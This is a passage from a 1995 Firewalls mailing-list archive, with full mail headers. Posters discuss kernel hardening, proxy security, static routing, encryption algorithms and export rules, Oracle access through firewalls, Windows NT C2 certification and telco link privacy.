firewalls-owner@GreatCircle.COM Precedence: bulk | Glenn Mackintosh writes: | | >.... That said, Border doesn't use a stock BSD based OS anyway. We | >have put a large amount of effort into "hardening" the kernel so that it is | >a solid base upon which to build a secure firewall. | ... [snip] .... | >We spent a considerable amount of manpower stripping down the kernel and | >leaving only what was really needed. We removed the mechanisms which can be | >used to gain privilege or increase the levels of access to the system. Rick Smith writes: | So, the "hardening" of the Borderware kernel consists primarily of | eliminating unnecessary portions of the BSD kernel, correct? | | This is not intended as a "leading question" from a competitor, just | an attempt to clearly understand what Borderware has done. No, I would *not* say this is the case. A significant amount of work *has* been done on elmiminating the unnecessary portions of the BSD kernel. However, a large amount of work has been done to take the remaining part of the BSD kernel and both change it and add to it to give our firewall the functionality we need. --gene gene@border.com - Sr. System Developer @ Border Network Technologies Inc. From firewalls-owner Tue Oct 10 17:00:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA09658 for firewalls-outgoing; Tue, 10 Oct 1995 16:57:31 -0700 Received: from netcom19.netcom.com (netcom19.netcom.com [192.100.81.132]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA09651 for ; Tue, 10 Oct 1995 16:57:28 -0700 Received: by netcom19.netcom.com (8.6.12/Netcom) id QAA27388; Tue, 10 Oct 1995 16:54:43 -0700 From: okuyama@netcom.com (Darin Okuyama) Message-Id: <199510102354.QAA27388@netcom19.netcom.com> Subject: TIS http proxy .. is it safe? To: firewalls@greatcircle.com (Firewall Mailing List) Date: Tue, 10 Oct 1995 16:54:42 -0700 (PDT) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 174 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What is the current version of the "http" proxy from TIS (actually I mean the toolkit)? Also, what security problems are known to exist in that version? ---Darin Okuyama From firewalls-owner Tue Oct 10 17:42:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA10266 for firewalls-outgoing; Tue, 10 Oct 1995 17:34:27 -0700 Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA10259 for ; Tue, 10 Oct 1995 17:34:24 -0700 Received: (pferguso@localhost) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id RAA19988; Tue, 10 Oct 1995 17:31:05 -0700 From: Paul Ferguson Message-Id: <199510110031.RAA19988@lint.cisco.com> Subject: Re: IP seq. number attacks To: sgcccdc@citec.qld.gov.au (Colin Campbell) Date: Tue, 10 Oct 95 17:31:05 PDT Cc: serge@freelunch.freenet.kiev.ua, Firewalls@GreatCircle.COM In-Reply-To: <9510102207.AA03777@citecub.citec.qld.gov.au>; from "Colin Campbell" at Oct 11, 95 8:07 am X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > With the setup you have, there is no real reason that I can see to exchange > routing information with your provider. You can both live with static routes. > You set the default route on your router to be his router. That way you can > always get out. He sets a static route to your router on his. There probably > isn't even any reason for the ISP to use dynamic routes since he probably > only has one connection to another router. > Bingo. In fact, I can understand why most providers would prefer to do static routing when only a single access exists, simply because it is much simpler to avoid injecting errant routes into an external routing protocol. :-) In any event, the most compelling reason to do any type of dynamic routing between a provider and client access is the presence of dual or multihomed connectivity. - paul -- Paul Ferguson || || cisco Systems || || Consulting Engineering |||| |||| pferguso@cisco.com ..:||||||:..:||||||:.. c i s c o S y s t e m s From firewalls-owner Tue Oct 10 19:42:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA12536 for firewalls-outgoing; Tue, 10 Oct 1995 19:35:08 -0700 Received: from ic.co.at (ic.co.at [193.81.168.69]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA12529; Tue, 10 Oct 1995 19:35:03 -0700 Received: from ic.co.at (ic.co.at [193.80.224.9]) by ic.co.at (8.7.1/8.7.1) with SMTP id EAA26761; Wed, 11 Oct 1995 04:39:27 -0100 Date: Wed, 11 Oct 1995 04:39:26 -0100 (GMT-0100) From: Michael Haberler To: Brent Chapman cc: firewalls@GreatCircle.COM, mcb@GreatCircle.COM Subject: Re: WE THE PEOPLE "....want the facts to make informed intel In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 10 Oct 1995, Brent Chapman wrote: > Spam mistakenly wrote: .. > Folks, the best way to deal with spam on a mailing list is to bring it to > the attention of the list management (believe me, we know about this one ... What about mailing list/news software which only would accept PGP-signed messages where the keys must have a certificate path lenth of at least 2 in the mailinglist web of trust (i.e. a contributor must be endorsed by at least two other)? Anybody aware of developments in this arena? Variations possible - you get the idea. I think it could reduce the random bozo factor by orders of magnitude. It will be the mode of operation to come for communities of common interest to protect against noise insertion by spammers. NB: Scientific citation indices are just a low-tech form of webs of trust. -michael Michael Haberler mah@eunet.co.at EUnet Austria Ltd MH182 A-1090 Vienna, Austria, Thurngasse 8/16 Tel: +43 (1) 31376 fax: +43 (1) 3106926 From firewalls-owner Tue Oct 10 21:42:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA14619 for firewalls-outgoing; Tue, 10 Oct 1995 21:36:58 -0700 Received: from netcom16.netcom.com (netcom16.netcom.com [192.100.81.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA14612 for ; Tue, 10 Oct 1995 21:36:56 -0700 Received: by netcom16.netcom.com (8.6.12/Netcom) id UAA20699; Tue, 10 Oct 1995 20:58:13 -0700 Date: Tue, 10 Oct 1995 20:58:12 -0700 (PDT) From: Joseph Seanor Subject: Re: Windows NT To: "A. Padgett Peterson, P.E. Information Security" cc: firewalls@greatcircle.com In-Reply-To: <951010134713.21056023@hobbes.orl.mmc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Where can people get the update for the C2 version of Windows NT? Other then waiting for Microsoft to send the update. Is there a site on the net? Joseph Seanor CIBIR Corporation From firewalls-owner Tue Oct 10 21:58:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA14667 for firewalls-outgoing; Tue, 10 Oct 1995 21:40:02 -0700 Received: from rds.com (wpgate.rds.com [206.54.49.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA14660 for ; Tue, 10 Oct 1995 21:39:59 -0700 Received: from RDS-Message_Server by rds.com with Novell_GroupWise; Tue, 10 Oct 1995 21:33:02 -0700 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Tue, 10 Oct 1995 21:39:36 -0700 From: Doug Kaye To: firewalls@greatcircle.com Subject: Thanks to Brent! Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I hope my fellow readers won't mind me taking up a slot in their inboxes for this, but I want to publically thank Brent Chapman for (a) making this list and majordomo available to all of us, and (b) *finally* :-) coming out with his excellent new book. ("Building Internet Firewalls", Chapman & Zwicky, O'Reilly.) I attended one of Brent's seminars about a year ago and have been awaiting the book ever since. Thanks, Brent. It was worth the wait! ...doug (FWIW, I have no other commercial, social or other connections with Brent or his company.) ============================================================ Doug Kaye Rational Data Systems, Novato, CA Tel:415-382-8400 FAX:415-382-8441 http://www.rds.com From firewalls-owner Tue Oct 10 22:12:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA15878 for firewalls-outgoing; Tue, 10 Oct 1995 22:05:50 -0700 Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA15871; Tue, 10 Oct 1995 22:05:45 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 10 Oct 1995 22:05:16 -0800 To: Doug Kaye , firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Thanks to Brent! Cc: firewalls-book@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 9:39 PM 10/10/95, Doug Kaye wrote: >I hope my fellow readers won't mind me taking up a slot in their inboxes >for this, but I want to publically thank Brent Chapman for (a) making this >list and majordomo available to all of us, and (b) *finally* :-) coming >out with his excellent new book. ("Building Internet Firewalls", Chapman >& Zwicky, O'Reilly.) I attended one of Brent's seminars about a year ago >and have been awaiting the book ever since. > >Thanks, Brent. It was worth the wait! You're very welcome; I'm glad that folks find the list and the book useful. -Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Wed Oct 11 00:00:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA18628 for firewalls-outgoing; Tue, 10 Oct 1995 23:44:49 -0700 Received: from hubert.lmv.lm.se (hubert.lmv.lm.se [143.237.63.126]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA18621 for ; Tue, 10 Oct 1995 23:44:46 -0700 Message-Id: <199510110644.XAA18621@miles.greatcircle.com> Received: from ibanez.lmv.lm.se (143.237.2.142) by hubert.lmv.lm.se id ; Wed, 11 Oct 1995 07:42:36 +0100 X-Sender: bengtg@hubert.lmv.lm.se X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 11 Oct 1995 07:41:15 -0500 To: Firewalls@GreatCircle.COM From: Bengt Gorden Subject: Re: Oracle <-> Firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: gary flynn >Date: Tue, 10 Oct 1995 08:28:47 -0400 >Subject: Re: Oracle <-> Firewall > >> From: David Schnardthorst >> Subject: Oracle <-> Firewall >> >> Does anybody know of a way to get Oracle Information through a Firewall? >> >> We are setting up a firewall, with our Web Servers on the outside, however >> we need to pass some information from an Oracle Database through the firewall >> to the outside Web Servers. >> >> Has anybody done this, and if so, could you please give me some ideas of >> how to accomplish this. >> > >I asked this about a month ago and haven't summarized so I'll do so now. > >There is no proxy version of SQLnet or its overlying applications. >Everyone is using a pass-thru filter like TIS's FWTK plug-gw or a >filtering router to pass SQLnet. Five or six people gave me the same >answer. > >There are probably two ways to do a SQLnet proxy. The first would >be to build a lot of intelligence into the proxy itself that could >understand what actions on what databases by what user was being >requested. The second would be to provide an API to SQLnet >based applications that allowed for things like querying for >authentication information. In either case, Oracle would have to >do it and the second case would involve modification of lots of >applications. Just idle speculation on my part :-) > Maybe I miss something here but wasn't the point to pass information from the Oracle server to the Web server? If that is the case you could use Oracles Web server. This will not automaticly give you security but you will be able to use the http proxy. /Bengan From firewalls-owner Wed Oct 11 01:30:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA20991 for firewalls-outgoing; Wed, 11 Oct 1995 01:19:02 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id BAA20984 for ; Wed, 11 Oct 1995 01:18:58 -0700 Received: from smtpgty.saicuk.co.uk by flow.pipex.net with SMTP (PP); Wed, 11 Oct 1995 09:17:00 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <307B8386@smtpgty.saicuk.co.uk>; Wed, 11 Oct 95 08:42:46 GMT From: "Johnson-Bryden, Ian" To: "'firewalls@greatcircle.com'" Subject: Re: International Encryption Protocols (RC2) or (IDEA) Date: Wed, 11 Oct 95 09:17:00 GMT Message-ID: <307B8386@smtpgty.saicuk.co.uk> Encoding: 71 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There is a lot of misinformation circulating about encryption. The OECD is due to make an announcement of recomendations around May next year which will apply to some 24 nations. The European Commission has encryption high on its agenda. DGXIII is reviewing the matter in respect of encryption across the member states and across international boundaries. An announcement could be made this year. Unlike OECD recomendations, work by the Commission will become a directive within the EU and that will supercede national legislation in the member states, or, more accurately, require member states to enact national legislation in support of the directive. It remains to be seen how this will interact with US Federal regulations and policies, but as the EU (and the countries preparing the make application to join the EU) represents the largest world economic group and market, it will be very difficult for other countries to ignor the EU policy. There is also a suggestion that encryption may be covered under GATT in that some national attitudes could be claimed to be in restraint of trade. At present any vendor can make claims and come up with creative ways around exisiting legislation, but the question is how this will later sit with national legislation and international agreement. Whatever you decide to do in the short term, it would be wise to watch forthcoming announcements. Ian J-B ---------- From: firewalls-owner To: raberry2 Cc: firewalls Subject: Re: International Encryption Protocols (RC2) or (IDEA) Date: Tuesday, October 10, 1995 4:26PM Ron Berry wrote: | international basis. One vendor supports RC2 for the standard | international encryption algorithm. I know little about RC2 and was | hoping someone could shed some light on this for me. What is the | definition of the acronym; What key lentgh is it based on; Who or what | orgainization is responsible for it (who designedit); is it widely | used??? RC2 is a trade secret of RSADSI. RC probably stands for 'Ron's Code,' after the author, Ron Rivest. It is not widely used, as it is slower than RC4, and until recently, there was no way of knowing which of the two algorithims is stronger. Thus, people using RSA technology tended to use RC4 instead. If an encryption algorithim can be exported from the United States, it is, by law, quite weak. I would urge that you look at buying your encryption technology outside of the US for worldwide delpoyment. IDEA is a relatively new cryptosystem, but it has been subjected to a fair amount of scrutiny, and it seems to resist most attacks well. RC2, being private, has not been subjected to anything like the same kind of scrutiny. I would suggest using IDEA or 3DES as your main bulk cryptosystem. For an excellent introduction to cryptography, read Bruce Schneier's Applied Cryptography. Any good technical library should have it. (I'd put off buying a copy; the much expanded second edition should be out soon.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Wed Oct 11 02:30:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA22557 for firewalls-outgoing; Wed, 11 Oct 1995 02:27:28 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA22550 for ; Wed, 11 Oct 1995 02:27:18 -0700 Received: from milano.europe.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA25488; Wed, 11 Oct 1995 05:25:22 -0400 Received: from roma by milano.europe.dg.com (5.4R3.10/200.1.1.4) id AA16392; Wed, 11 Oct 1995 10:25:12 +0100 Received: from pc-mirto-it by roma.europe.dg.com (5.4R3.10/dg-s01) id AA22055; Wed, 11 Oct 1995 10:27:20 +0100 Received: by pc-mirto-it with Microsoft Mail id <01BA97C3.BA8671E0@pc-mirto-it>; Wed, 11 Oct 1995 10:24:20 +-100 Message-Id: <01BA97C3.BA8671E0@pc-mirto-it> From: Mirto Busico To: "'firewalls@greatcircle.com'" Subject: R: International Encryption Protocols (RC2) or (IDEA) Date: Wed, 11 Oct 1995 10:24:19 +-100 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think that there is an UE Recommendation already emitted. The Recommendation is:"Concerning Problems of Criminal Procedure Law = Connected with Information Technology".=20 No. R (95) 13 You can find it at: http://www.eff.org/pub/Global/Multinational/Privacy The information cames from this message:=20 ____________ begin received message_______________________________ Come forse gia` saprete, il Consiglio d'Europa ha emanato una "raccomandazione" (Recommendation No. R (95) 13) dal titolo "Concerning Problems of Criminal Procedure Law Connected with Information Technology". Il testo completo si puo` trovare in http://www.eff.org/pub/Global/Multinational/Privacy/ L'ultimo bollettino dell'EFF (EFFector 08.16) contiene una breve analisi della raccomandazione. Una vivace discussione e` in corso sul newsgroup di Usenet "talk.politics.crypto". Posso inviare per e-mail i testi (11 kB e 66 kB reipettivamente) a chi non avesse accesso a WWW (possibile?).=20 Massimo Campostrini,=20 Istituto Nazionale di Fisica Nucleare, Sezione di Pisa e-mail: campo@sunthpi3.difi.unipi.it WWW home page: http://www.difi.unipi.it/~campo/ _______________end received message______________________________ ---------- Da: Johnson-Bryden, Ian[SMTP:IJB@saicuk.co.uk] Inviato: mercoled=EC 11 ottobre 1995 10.17 A: 'firewalls@greatcircle.com' Oggetto: Re: International Encryption Protocols (RC2) or (IDEA) There is a lot of misinformation circulating about encryption. The OECD is due to make an announcement of recomendations around May = next=20 year which will apply to some 24 nations. The European Commission has=20 encryption high on its agenda. DGXIII is reviewing the matter in respect = of=20 encryption across the member states and across international boundaries. = An=20 announcement could be made this year. Unlike OECD recomendations, work = by=20 the Commission will become a directive within the EU and that will = supercede=20 national legislation in the member states, or, more accurately, require=20 member states to enact national legislation in support of the directive. It remains to be seen how this will interact with US Federal regulations = and=20 policies, but as the EU (and the countries preparing the make = application to=20 join the EU) represents the largest world economic group and market, it = will=20 be very difficult for other countries to ignor the EU policy. There is = also=20 a suggestion that encryption may be covered under GATT in that some = national=20 attitudes could be claimed to be in restraint of trade. At present any vendor can make claims and come up with creative ways = around=20 exisiting legislation, but the question is how this will later sit with=20 national legislation and international agreement. Whatever you decide to = do=20 in the short term, it would be wise to watch forthcoming announcements. Ian J-B ---------- From: firewalls-owner To: raberry2 Cc: firewalls Subject: Re: International Encryption Protocols (RC2) or (IDEA) Date: Tuesday, October 10, 1995 4:26PM Ron Berry wrote: | international basis. One vendor supports RC2 for the standard | international encryption algorithm. I know little about RC2 and was | hoping someone could shed some light on this for me. What is the | definition of the acronym; What key lentgh is it based on; Who or what | orgainization is responsible for it (who designedit); is it widely | used??? RC2 is a trade secret of RSADSI. RC probably stands for 'Ron's Code,' after the author, Ron Rivest. It is not widely used, as it is slower than RC4, and until recently, there was no way of knowing which of the two algorithims is stronger. Thus, people using RSA technology tended to use RC4 instead. If an encryption algorithim can be exported from the United States, it is, by law, quite weak. I would urge that you look at buying your encryption technology outside of the US for worldwide delpoyment. IDEA is a relatively new cryptosystem, but it has been subjected to a fair amount of scrutiny, and it seems to resist most attacks well. RC2, being private, has not been subjected to anything like the same kind of scrutiny. I would suggest using IDEA or 3DES as your main bulk cryptosystem. For an excellent introduction to cryptography, read Bruce Schneier's Applied Cryptography. Any good technical library should have it. (I'd put off buying a copy; the much expanded second edition should be out soon.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume ______________________________________________________________________ Opinions expressed are mine and not those of my employer ______________________________________________________________________ Mirto Busico | e-mail mirto@roma.europe.dg.com Data General Italia | phone +39-6-50511398 ______________________________________________________________________ From firewalls-owner Wed Oct 11 02:43:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA22761 for firewalls-outgoing; Wed, 11 Oct 1995 02:34:25 -0700 Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA22754 for ; Wed, 11 Oct 1995 02:34:18 -0700 From: gblolmxb@ibmmail.com Message-Id: <199510110934.CAA22754@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R2) with BSMTP id 8669; Wed, 11 Oct 95 05:32:23 EDT Date: Wed, 11 Oct 1995 05:35:37 EDT To: avalon@coombs.anu.edu.au, firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Darren Reed wrote about his local telco starting up a 'private' network, in conjunction with AT&T, NTT,Unisource and Deustche Telekom. This sort of network has been around for some time, IBM for example have a global network, and it can be use for IP, IPX etc. I have raised the need for a firewall to filter IP traffic in the past, but have been told that there is no need as the network is private & secure. I dont believe this, does anyone else have any comments? (preferably from people who know about IBM's MPN). Mark. From firewalls-owner Wed Oct 11 03:00:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA22803 for firewalls-outgoing; Wed, 11 Oct 1995 02:40:43 -0700 Received: from emvax1.mainz.dk (EMVAX1.MAINZ.DK [193.89.24.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA22781 for ; Wed, 11 Oct 1995 02:39:03 -0700 Date: Wed, 11 Oct 1995 09:55:37 +0100 (MET) Date-warning: Date header was inserted by MAINZ.DK From: Kim Wohlert Subject: Re: Windows NT To: Firewalls@GreatCircle.COM Cc: PADGETT@hobbes.orl.mmc.com Message-id: <01HWB61KZ9MQ0004P9@MAINZ.DK> MIME-version: 1.0 X-Mailer: Windows Eudora Light Version 1.5.2 Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "A. Padgett Peterson, P.E. Information Security" >Date: Tue, 10 Oct 1995 13:47:13 -0400 (EDT) >Subject: Windows NT > >At the NIST/NSA/NCSC conference it was announced that Windows NT >has met C2 requirements and may display the logo on its >packages. The "Administrator's Security Guide" lists configurations for >Compaq ProLiant 2000 & 4000 & DECpc AXP/150. > >*None* of the configurations include a network interface card (am assured >that that will be included RSN (4-6 months est.)). I most correct you here. Both of the above Compaqs come with a network interface card built in, so no configuration is possible without a card. Thus I would assume the C2 certification covers that. I *think* the AXP also has a NIC built in, but haven't been able to confirm this on short notice. Regards -Kim =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Kim Wohlert |Internet:Kim.Wohlert@mainz.dk erik mainz a/s |X.400: c=DK a=DK400 p=Minerva Dortheavej 7 |o=mainz s=Wohlert g=Kim DK-2400 Copenhagen |Phone: +45 38 34 77 88 Denmark |Fax: +45 31 19 16 25 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- I guess sometimes there just aren't enough stones to throw. -Forest Gump From firewalls-owner Wed Oct 11 03:43:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA23853 for firewalls-outgoing; Wed, 11 Oct 1995 03:29:37 -0700 Received: from bastion.sentinet.demon.co.uk (sentinet.demon.co.uk [158.152.140.128]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA23846 for ; Wed, 11 Oct 1995 03:29:31 -0700 Received: (from smap@localhost) by bastion.sentinet.demon.co.uk (8.6.12/8.6.12) id KAA27843 for ; Wed, 11 Oct 1995 10:27:33 GMT Received: from server.sentinet.demon.co.uk(192.168.1.100) by bastion.sentinet.demon.co.uk via smap (V1.3) id sma027840; Wed Oct 11 10:27:28 1995 Received: from server.sentinet.demon.co.uk (lyndond@[127.0.0.1]) by server.sentinet.demon.co.uk (8.6.12/8.6.12) with ESMTP id LAA25359 for ; Wed, 11 Oct 1995 11:27:25 +0100 Message-Id: <199510111027.LAA25359@server.sentinet.demon.co.uk> To: firewalls@greatcircle.com Subject: Telco networks Date: Wed, 11 Oct 1995 11:27:17 +0100 From: Lyndon David Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, At a recent meeting with a client I offered that they should not consider the ISDN, frame relay etc networks private and that to be sure of security they should crypt the links. Other than hearsay I am unable to quantify the problem or give any measure of how difficult it is listen in / modify the link. Does anyone have any more information as to what the vunerabilities are and how easy/hard they would be. While we are at it, how long is a piece of string :) Thanks Lyndon From firewalls-owner Wed Oct 11 04:00:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA24014 for firewalls-outgoing; Wed, 11 Oct 1995 03:35:08 -0700 Received: from mail0.iij.ad.jp (mail0.iij.ad.jp [192.244.176.61]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA24007 for ; Wed, 11 Oct 1995 03:34:58 -0700 Received: from uucp0.iij.ad.jp (uucp0.iij.ad.jp [192.244.176.51]) by mail0.iij.ad.jp (8.6.12+2.4W/3.3W9-MAIL) with ESMTP id TAA22275; Wed, 11 Oct 1995 19:32:56 +0900 Received: (from uucp@localhost) by uucp0.iij.ad.jp (8.6.12+2.4W/3.3W9-UUCP) with UUCP id TAA16785; Wed, 11 Oct 1995 19:32:55 +0900 Received: from is.mazda.co.jp by mazda.co.jp (8.6.12+2.5Wb4/3.3Wb) id SAA14403; Wed, 11 Oct 1995 18:59:31 +0900 Received: from picmqsn by is.mazda.co.jp (8.6.12/3.3Wb) id SAA13323; Wed, 11 Oct 1995 18:54:35 +0900 Message-Id: <9510111002.AA00441@picmqsn.is.mazda.co.jp> Date: Wed, 11 Oct 1995 19:02:01 +0900 From: Yoshihisa SUNADA To: David Schnardthorst Cc: firewalls@GreatCircle.COM Subject: Re: Oracle <-> Firewall In-Reply-To: <199510101231.FAA14205@miles.greatcircle.com> X-Mailer: AL-Mail 1.10 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk gary flynn wrote$B!'(J >> From: David Schnardthorst >> Subject: Oracle <-> Firewall >> >> Does anybody know of a way to get Oracle Information through a Firewall? >> >> We are setting up a firewall, with our Web Servers on the outside, however >> we need to pass some information from an Oracle Database through the firewall >> to the outside Web Servers. >> >> Has anybody done this, and if so, could you please give me some ideas of >> how to accomplish this. >> > >I asked this about a month ago and haven't summarized so I'll do so now. > >There is no proxy version of SQLnet or its overlying applications. >Everyone is using a pass-thru filter like TIS's FWTK plug-gw or a >filtering router to pass SQLnet. Five or six people gave me the same >answer. > >There are probably two ways to do a SQLnet proxy. The first would >be to build a lot of intelligence into the proxy itself that could >understand what actions on what databases by what user was being >requested. The second would be to provide an API to SQLnet >based applications that allowed for things like querying for >authentication information. In either case, Oracle would have to >do it and the second case would involve modification of lots of >applications. Just idle speculation on my part :-) > I think that another possible method at present is to install another Oracle DBMS and its distributed option on "proxy machine". And on another server you create views that link to the internal Oracle DB server. But you have to purchase one more Oracle DB Server and its distributed option. _/ $B:=ED!!2B5W(J _/ _/ $B")#7#3#5(J $B9-Eg8)0B7]74I\CfD.?7CO#3(J-$B#1(J _/ _/ $B%^%D%@3t<02qpJs%7%9%F%`K\It(J $B%7%9%F%`5;=Q(JGr. _/ _/ Phone: 082-287-4865 ($BD>DL(J) _/ _/ Fax: 082-287-5233 _/ _/ E-mail: sunada.y@is.mazda.co.jp _/ From firewalls-owner Wed Oct 11 04:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA25130 for firewalls-outgoing; Wed, 11 Oct 1995 04:20:21 -0700 Received: from freelunch.freenet.kiev.ua (freelunch.freenet.kiev.ua [194.44.28.250]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA25123 for ; Wed, 11 Oct 1995 04:20:07 -0700 Received: (from serge@localhost) by freelunch.freenet.kiev.ua (8.6.12/osf3.2xla) id NAA22719; Wed, 11 Oct 1995 13:18:56 +0200 Date: Wed, 11 Oct 1995 13:18:56 +0200 (EET) From: Sergey Zhuk To: Paul Ferguson cc: Colin Campbell , Firewalls@GreatCircle.COM Subject: Re: IP seq. number attacks In-Reply-To: <199510110031.RAA19988@lint.cisco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi On Tue, 10 Oct 1995, Paul Ferguson wrote: > In fact, I can understand why most providers would prefer to do static > routing when only a single access exists, simply because it is much > simpler to avoid injecting errant routes into an external routing > protocol. :-) yep ;) > In any event, the most compelling reason to do any type of dynamic > routing between a provider and client access is the presence of > dual or multihomed connectivity. and this is my case ;) look at my next answer in Firewalls... -- +-------------------------------------+-------------------------------------+ | Sergey Zhuk | serge@freenet.kiev.ua | | UN Internet Project | +380-44-228-6393 | | System and Network Administrator | www.freenet.kiev.ua, www.un.kiev.ua | +-------------------------------------+-------------------------------------+ From firewalls-owner Wed Oct 11 04:43:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA25110 for firewalls-outgoing; Wed, 11 Oct 1995 04:18:01 -0700 Received: from freelunch.freenet.kiev.ua (freelunch.freenet.kiev.ua [194.44.28.250]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA25102 for ; Wed, 11 Oct 1995 04:17:36 -0700 Received: (from serge@localhost) by freelunch.freenet.kiev.ua (8.6.12/osf3.2xla) id NAA22050; Wed, 11 Oct 1995 13:16:29 +0200 Date: Wed, 11 Oct 1995 13:16:28 +0200 (EET) From: Sergey Zhuk To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V4 #583 In-Reply-To: <199510102231.PAA06184@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi > From: sgcccdc@citec.qld.gov.au (Colin Campbell) > Date: Wed, 11 Oct 95 8:07:39 EST > Subject: Re: IP seq. number attacks > > Hi, > > With the setup you have, there is no real reason that I can see to exchange > routing information with your provider. You can both live with static routes. no, indeed i have more complex structure, that was just a fragment and i have at least 3 alternative paths to ouside world. I've solved the problem with ICMP redirects, but it's still one with addresses from my subnet on external router. Now i'm restricting packets from that address to only one destination and only 2 ports of udp... -- +-------------------------------------+-------------------------------------+ | Sergey Zhuk | serge@freenet.kiev.ua | | UN Internet Project | +380-44-228-6393 | | System and Network Administrator | www.freenet.kiev.ua, www.un.kiev.ua | +-------------------------------------+-------------------------------------+ From firewalls-owner Wed Oct 11 05:30:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA26511 for firewalls-outgoing; Wed, 11 Oct 1995 05:12:58 -0700 Received: from faui45.informatik.uni-erlangen.de (faui45.informatik.uni-erlangen.de [131.188.2.45]) by 